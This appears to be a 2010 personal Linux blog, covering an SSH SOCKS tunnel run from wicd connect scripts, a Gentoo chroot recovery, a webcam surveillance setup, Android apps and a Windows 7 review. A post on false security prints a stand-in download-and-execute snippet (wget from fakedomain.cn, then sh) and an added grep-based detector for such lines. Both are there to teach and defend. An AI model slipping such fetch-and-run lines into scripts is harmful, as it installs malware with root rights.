This creates an SSH tunnel that listens on localhost port 9999 (-D, bound explicitly to 127.0.0.1 so nobody else on the wireless can use your proxy), expects no further commands (-N), and is forked to the background (-f), to my SSH server out on the internets. ExitOnForwardFailure makes ssh give up if port 9999 is already taken instead of sitting there with no proxy, and the ServerAlive options make it notice a dead connection within about a minute and a half. Also, since we set up public key authentication, it won't prompt for a password. Connect to the server by hand once first so its host key is already in known_hosts; an unattended ssh that is asked to accept a new host key will just hang.

Any program that allows proxying, such as a web browser, can now be pointed at 127.0.0.1 on port 9999 and it will push all of its traffic through the encrypted connection. One catch: by default Firefox still resolves names locally, which leaks every site name to the hotspot; set network.proxy.socks_remote_dns to true so DNS goes through the tunnel as well.

And finally, wicd:   
Before you connect to an access point, click on the properties button, and then the scripts button. There you will see four blank lines, one of the should be "Post-connection Script". On that line, just enter the location of your ssh script, in our case /scripts/ssh_tunnel.sh.


Now, in the event that you lose your connection it's possible that the ssh_tunnel process will remain active even though the session is dead.. in that event you may want to put a Post-disconnect Script in place that kills it. A plain "pkill ssh" works but also kills every other ssh session you have open; "pkill -f 'ssh -f -N -D'" only takes out the tunnel.

That's it, you will have an encrypted tunnel at your disposal whenever you think you might need one, without having to touch the terminal again or remember the needed commands.
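The one-liner leaves two loose ends: a second connect event starts a second tunnel (which then dies on ExitOnForwardFailure), and the disconnect side has to guess which ssh to kill. Below is an added example, not from the original post, of a connect/disconnect pair that records the tunnel's pid and only ever starts or kills that one process; it is meant to be installed once and symlinked as tunnel_up.sh and tunnel_down.sh for wicd's two script fields. The server, user, key path and port are placeholders taken from the post, and SSH_CMD exists only so the logic can be exercised without a real server.

```bash
#!/bin/bash
# Added example: start one SOCKS tunnel per connection and tear down only that one.
TUNNEL_HOST="${TUNNEL_HOST:-username@my.sshserver.org}"   # placeholder
TUNNEL_KEY="${TUNNEL_KEY:-$HOME/.ssh/id_rsa}"
TUNNEL_PORT="${TUNNEL_PORT:-9999}"
PIDFILE="${PIDFILE:-/tmp/ssh_tunnel.pid}"

# Exit 0 if the pid recorded in $PIDFILE is still alive.
tunnel_running() {
    [ -r "$PIDFILE" ] && kill -0 "$(cat "$PIDFILE")" 2>/dev/null
}

# Start the SOCKS tunnel unless one is already up. ssh is backgrounded with &
# rather than -f so that $! is the real ssh pid (with -f it would be the parent).
# SSH_CMD lets a test substitute something other than ssh.
tunnel_up() {
    tunnel_running && return 0
    ${SSH_CMD:-ssh} -N -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 \
        -i "$TUNNEL_KEY" -D "127.0.0.1:$TUNNEL_PORT" "$TUNNEL_HOST" &
    echo $! > "$PIDFILE"
}

# Kill exactly the tunnel we started, never every ssh on the box.
tunnel_down() {
    if tunnel_running; then
        kill "$(cat "$PIDFILE")"
    fi
    rm -f "$PIDFILE"
}

# Behaviour follows the name the script was invoked by (symlink it twice).
case "$(basename "$0")" in
    tunnel_up.sh)   tunnel_up ;;
    tunnel_down.sh) tunnel_down ;;
esac
```

Put /scripts/tunnel_up.sh in wicd's Post-connection Script field and /scripts/tunnel_down.sh in Post-disconnection; because tunnel_up is idempotent it is also safe to run from cron as a watchdog.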

Thursday, February 11, 2010

cloud storage

shameless plug for Dropbox... I'm really enjoying being able to so easily store and share files. I set it up on my server, a Windows machine, a couple Ubuntu systems, and even my Droid (Droidbox, pay the 2 bucks for it). We will see how long it takes me to fill up the free storage space.

UPDATE: Using dropbox to share project files and collaborate for college course work is pretty awesome. It beats svn in usability, though it's not quite as reliable.

Monday, February 8, 2010

Server goes boom?

UPDATE: Recovery went smoothly and my server has been humming away without any further issues. Here's to gentoo, and here's to linode.

My linode was involved in some kind of horrific serverroom accident which left it in a pretty funky state once they got the surviving disks into a working box. Luckily linode has its own recovery live image called "finnix", pretty spiffy. Boot with that, chroot into gentoo, and see if i can bring it back from the dead...

Since I keep forgetting the sequence,
im just gonna leave this here:

# mount /dev/hda3 /mnt/gentoo
# mount /dev/hda1 /mnt/gentoo/boot
# mount -t proc none /mnt/gentoo/proc
# mount -o bind /dev /mnt/gentoo/dev
# cp -L /etc/resolv.conf /mnt/gentoo/etc/resolv.conf
# chroot /mnt/gentoo /bin/bash
# env-update
# source /etc/profile
# export PS1="(chroot) $PS1"
(chroot) #

Sunday, February 7, 2010

weekend projects

So after messing with the netbook surveillance thing for a while I decided to actually make a more permanent solution. I went out and got a cheap little webcam, stuck it in my front window to monitor the front of the house, and using the same basic config on the server in my living room got it all rigged up to record anything that happens throughout the day. The next step is to set up DNS for my home IP again so I can check in on the camera while I'm not home, and maybe to set up something like Dropbox so the video captures it creates are stored in "the cloud". All in all it's a pretty decent home surveillance setup for under 50 bucks.

Setup an ubuntu server and messed with the ubuntu firewall (since it overrides iptables, and iptables overrides it... this is just dumb, but whatever). Nothing much is new, but for those of you using portsentry to secure your ubuntu box, ROUTE_KILL should be "/usr/sbin/ufw deny from $TARGET$".

Facebook app for the android phone is pretty nifty, uploading photos straight from the program is nice and smooth. Yeah... using facebook, and blogging, and twittering... I've been corrupted by the internet.

Friday, February 5, 2010

Turning a netbook into a surveilance device, part 1

Ive started a fun little side project of turning a netbook into a portable home security terminal. I'm starting simple, of-course, with a stationary (but portable) surveillance camera / dvr with two way audio.

The idea just originated with the fact that in our house you can't hear someone at the door unless you're in the living room, and we typically leave the wooden door open with the security screen closed, so a camera placed there could see through the screen and I could then have a feed in any room of the house or in the backyard showing me the front door. However this may evolve into something more permanent and less hackey, as recently a UPS shipment that was scanned in as delivered to my house was nowhere to be found.

The netbook is a 1000HA eeepc and is currently running backtrack4, effectively ubuntu linux 9.10, and has essentially all the hardware one would desire in a cheap home surveillance camera (it is on temporary hiatus from the gentoo netbook project while I play with backtrack).
  • decent camera - check.
  • audio out - check
  • microphone - check
  • wifi - check
  • 6+ hours of battery life - check
Video streaming / DVR
I stumbled upon a package in ubuntu called "motion" which is a dvr/webserver for webcam based video inputs, and records images/video based on motion-detection software... perfect!

First, Install the package
#apt-get install motion

Next, edit the config file
#vim /etc/motion.conf
I set the following values:
  • width 352
  • height 288
  • framerate 10
  • threshold 500 (much higher sensitivity for motion based recording)
  • target_dir /e/dvr (which is a mounted network share to a storage server)
  • webcam_maxrate 10
Finally just restart the motion server and it will be streaming whatever the camera is pointed at on port 8081, and will record images/videos whenever motion beyond the threshold is detected. That stream has no authentication of its own, so keep webcam_localhost on and reach it over SSH, or firewall port 8081, whenever the netbook is on a network you don't control.
#/etc/init.d/motion restart

Thursday, February 4, 2010

Top 10 android apps - My Favorites

DroidRootPro
  • For those of us with rooted Droid phones, this app makes installing the recovery system, specialized themes, and all the base files needed for flashing new roms to the device as easy as pressing a few buttons.
Google Listen
  • Podcast browser/downloader/player that keeps an updated list of subscriptions and downloads the latest episodes for you in the background. Really great for downloading your favorite podcasts to listen to on the road.
AndFTP
  • For the want of an accessible sd-card... AndFTP is a simple and effective ftp client for android that makes moving files to and from the phone wireless and easy without the need for bluetooth.
PdaNet
  • The coolest of the bunch, this uses paired software on the phone as well as your computer to enable tethering, and it doesn't even need root to do it. The software on your computer sets up a TUN modem driver and the tether is done through usb or bluetooth.
Twidroid
  • So I used to hate the very existence of twitter, but lately I've found it to be an invaluable source of information, and Twidroid lets me keep up with the constant feed while on the go.
Shopsavvy
  • Mostly as a byproduct of being a college student and needing to occasionally buy insanely overpriced books, this has become a necessity. Scan the book's (or anything's) barcode with your camera, and shopsavvy will find the lowest offered prices locally as well as online.
Password Safe
  • Encrypted vault for sensitive information. I actually don't use it for passwords, but for other sensitive information that I need to remember details of while keeping secure. This app has tons of templates and uses a master password to unlock.
Astro Player
  • We don't have an audible.com app yet, but Astro Player will play audiobooks (actually it will play just about any audio format I can find), and it's also good to have a spare audio player so that you can play music on the normal player without losing your place in the audiobook in Astro.
Connectbot
  • It's Linux, we must have ssh.
Wifi Analyzer
  • Fun and handy app that graphically displays local wifi signals on a graph, showing their relative strength and which channels they are on or interfere with. Very useful when setting up a new access point.

Wednesday, February 3, 2010

False Security

Get a Mac so that you don't have to worry about viruses...

Linux is immune to malware...

Only windows users have to worry about security software...


If I were a "bad guy", Mac OS X and, to a lesser extent, Linux are the platforms I would be targeting right now for spreading viruses and botnets. This is simply because you can depend on the majority of end users to naively click anything on the web, follow bogus instructions, and not have an antivirus installed, since they're running a system that's "invulnerable".

Since most malware these days that people get infected with is designed not to exploit the system on its own to gain access, but merely to trick the user into installing it themselves, the less paranoid your target is the more likely they are to get infected.

Trojan .dmg file for OSX:

Linux is a little harder due to the repository system; users don't typically download software off of a website. However, a lot of system fixes, driver fixes, or advanced setups use shell scripts, and those scripts almost always require root permissions. If you grab someone's several-hundred-line script to set up/fix something for you, what's stopping them from having embedded a couple of lines which fetch and install a malicious piece of software as well? Unless you read the script entirely and know what you are doing, or it came from a well-reviewed source, there is no assurance that it is safe to use.

example... in the middle of some random script you found is this: 
...
wget fakedomain.cn/x/tmp.sh
sh tmp.sh
rm tmp.sh
...

You gave root/sudoer permission to the script initially (to fix your problem, get that driver to work, set up a service for you, etc.), and you have no idea what tmp.sh does. Most users won't notice the new daemon that's running in the background if it's not using up too much in the way of resources, just like in Windows.
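A defensive counterpart to the snippet above, added here and not part of the original post: a shell function that flags download-and-execute lines like the ones shown, plus a few related ways of hiding or persisting a payload, so a "fix-it" script can be skimmed for them before it is run with sudo. It assumes GNU grep for the \b word boundaries; the sample script it audits is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): a pre-flight audit for a
# third-party "fix-it" script before handing it root. It flags the
# download-then-execute pattern the post describes, plus a few related ways
# of hiding or persisting a payload. Heuristic only: a clean report is not
# proof of safety; you still need to read the script. Assumes GNU grep (\b).

# audit_script FILE -> prints "line:text" for each suspicious line;
# returns 0 when nothing was flagged, 1 otherwise.
audit_script() {
    if grep -nE \
        -e '\b(wget|curl|fetch)\b' \
        -e '[|][[:space:]]*(ba|da|z|k)?sh\b' \
        -e '\b(sh|bash)[[:space:]]+[^[:space:]]*\.sh\b' \
        -e '\beval\b' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -e '(crontab|/etc/cron|/etc/init\.d|/etc/rc\.local|\.bashrc)' \
        "$1"; then
        return 1
    fi
    return 0
}

# Constructed sample: a plausible "wifi driver fix" script with the post's
# fetch/run/delete lines buried in the middle.
write_sample() {
    cat > "$1" <<'EOF'
#!/bin/sh
modprobe -r ath9k
echo "options ath9k nohwcrypt=1" > /etc/modprobe.d/ath9k.conf
wget fakedomain.cn/x/tmp.sh
sh tmp.sh
rm tmp.sh
modprobe ath9k
EOF
}

# Usage: write_sample /tmp/fix.sh; audit_script /tmp/fix.sh || echo "review it"
```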

Stop telling people to use either system so that they don't need to worry about viruses. Unix systems are more secure in general, there is less malware out there for them right now, but they are not immune to being infected.

All computer users should exercise some common sense and maintain a bit of healthy distrust.

Tuesday, February 2, 2010

Blogaway 3.0


Testing out the Blogaway Android app on my Motorola Droid. It seems pretty slick and feature-rich so far. Trying its image upload, which is tied into Picasa, with a picture of my street after a recent rain storm.

Mastering Iptables

@SecurityTube pointed out this three part series on how to use Iptables in Linux, and, since they contain some awesome info for anyone interested in Linux security, I'm embedding them here as well.

These videos go from the basic concepts of iptables to intermediate usage and are the same source I started with when learning. Have a system available to play with, and pause/repeat often.

Also check out my listing of useful Iptables rules.

Monday, February 1, 2010

Programming Tutorials

Links to programming tutorials that I find helpful:

C++
-http://www.cplusplus.com/doc/tutorial/
Java
-http://www.freejavaguide.com/corejava.htm
Perl
-http://www.tizag.com/perlT/perlfirstscript.php
Python
-http://www.python.org/doc/2.5.2/tut/node5.html
Ruby
-http://www.fincher.org/tips/Languages/Ruby/
-http://ruby-doc.org/docs/ProgrammingRuby/ (Recommended by aking1012 @amcomworks)

--------------------------------
Video Tutorials
-http://securitytube.net/Programming-Video-List.aspx  (thanks to Ramaz @securitytube)
--These include basic primers on C, assembly, and some python as well as many videos about security related programming.
--------------------------------
Related Study
-http://bit.ly/9PjVxg A complete reference manual to the linux kernel (Courtesy of aking1012 @amcomworks)


Chances are good that this post will be revised whenever I find more links to add.

Windows 7: six month review

It has now been 6 months that I have forced myself to use Windows as my primary OS, and my general impression of it is fairly good. This was a project to just re-familiarize myself with the Windows OS so that I wouldn't completely lose touch with its ins and outs, and also to pull myself back from the "whichever system I don't use SUCKS" mentality that is so prevalent in the tech world (trying to stay out of the Droid/iPhone flamewars too...).

Pros:
  • Windows 7 is actually stable for the most part; I haven't had a single system freeze or BSOD.
  • Management of system resources seems much improved, can't argue with the speed and multitasking efficiency.
  • The days of required periodic reboots are gone, I've only had to reboot once to solve a problem (sound had stopped working, who knows? just reboot...)
  • Security seems to finally be taken seriously by Microsoft, the system's networking is much more locked down and almost everything runs with limited permissions.
  • Thanks to open development, most software that you need now has a free equivalent, which was one of the major draws to linux.

Cons:
  • For some reason when I unplug my laptop, the video driver crashes... in the Linux world I would be able to fix that in the config, or work with an open development team on the problem. In Windows I just have to wait for Microsoft to fix it, if it ever gets fixed at all.
  • The Windows shell is still not intuitive to use; PowerShell is a bit better than CMD but still missing a lot of the functionality that bash has.
  • Compatibility Mode is NOT a feature! It's a patch that is a pain in the ass.. having to tell a program to run under legacy DLLs and system parameters to get it to work at all is just a bad way to manage applications.
  • Windows Firewall still seems to have limited functionality and a poor user interface... can we just have a cli like iptables for it please?
  • And as always, the cost... software that costs hundreds of dollars should be superior in every way to similarly purposed software that is free. I do not see the value in windows 7 that justifies its cost.

I didn't include anything about games.. because I'm not a gamer. However, I've seen some awesome videos of people running Crysis on their Gentoo rigs..

I can see Windows 7 being a decent system for most people. Most of my complaints lean towards the geeky side, most people wouldn't really care about them, and most people are willing to pay the money for the OS that is familiar to them. I think Win7 has pulled Microsoft's ass out of the fire after that horrible dark age they brought on known as "Vista".

Haven't decided what system to run now, time to browse distrowatch or something...